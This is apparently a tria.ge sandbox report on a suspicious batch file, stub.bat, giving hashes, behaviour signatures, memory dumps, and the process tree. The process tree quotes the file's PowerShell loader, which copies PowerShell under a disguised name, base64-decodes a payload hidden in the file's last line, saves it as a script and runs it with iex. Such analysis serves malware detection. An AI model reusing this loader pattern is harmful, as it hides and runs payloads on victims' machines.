Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

08/07/2024, 15:19

240708-sqj4jaxflf 10

08/07/2024, 13:40

240708-qyw2ys1gll 8

Analysis

  • max time kernel
    361s
  • max time network
    363s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
  • submitted
    08/07/2024, 15:19

General

  • Target

    stub.bat

  • Size

    3.4MB

  • MD5

    c27b8c9f05c86817d8d287f0d0bd8698

  • SHA1

    239748a1871a85c7df6733bc24d9497a331aca87

  • SHA256

    cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1

  • SHA512

    fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca

  • SSDEEP

    49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe (PID 2136)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2368, child of 2136)
      powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2368-4-0x000007FEF5C6E000-0x000007FEF5C6F000-memory.dmp (4KB)
  • memory/2368-5-0x000000001B4C0000-0x000000001B7A2000-memory.dmp (2.9MB)
  • memory/2368-6-0x0000000002340000-0x0000000002348000-memory.dmp (32KB)
  • memory/2368-7-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)
  • memory/2368-9-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)
  • memory/2368-10-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)
  • memory/2368-12-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)
  • memory/2368-13-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)
  • memory/2368-14-0x000000001BBC0000-0x000000001BBCE000-memory.dmp (56KB)
  • memory/2368-15-0x000000001ACE0000-0x000000001ADD0000-memory.dmp (960KB)
  • memory/2368-16-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp (9.6MB)